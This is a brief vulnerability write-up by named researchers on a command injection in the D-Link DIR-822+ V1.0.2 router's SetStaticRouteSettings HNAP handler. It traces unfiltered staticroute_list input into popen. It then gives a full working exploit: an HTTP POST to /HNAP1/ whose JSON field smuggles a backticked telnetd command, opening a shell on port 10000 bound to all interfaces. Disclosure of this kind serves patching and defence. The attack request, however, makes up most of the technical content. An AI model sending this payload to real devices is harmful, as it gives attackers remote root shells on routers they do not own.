Yangyi/HuoXingpeng
D-Link DIR-822+ V1.0.2 was found to contain a command injection in SetStaticRouteSettings
function. allows remote attackers to execute arbitrary commands via shell
Use ’,‘ to segment data from the staticroute list
and pass in the sub_437028
function
This part of the data was directly passed in FCGI_popen
without any filtering
FCGI_popen
Called popen
to create a pipeline to execute the command.
Based on the cause of the vulnerability, we only need to use commas to separate three addresses and the command to be executed. The final constructed EXP is as follows:
POST /HNAP1/ HTTP/1.1
Host: 192.168.0.1
Content-Length: 50
Accept: application/json
HNAP_AUTH: 4EDFBBC3845CEF88B0CC7B5A5B9419EB 1703160655517
SOAPACTION: "http://purenetworks.com/HNAP1/SetStaticRouteSettings"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0
Content-Type: application/json
Origin: http://192.168.0.1
Referer: http://192.168.0.1/Staticroute.html
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: uid=VtVTeClk; PrivateKey=990D6EA08F8E8583354AD9D96CB35450; timeout=56
Connection: close
{"SetStaticRouteSettings":{"staticroute_list":"192.168.1.1,255.255.255.255,192.168.0.1,`telnetd -l /bin/sh -p 10000 -b 0.0.0.0`"}}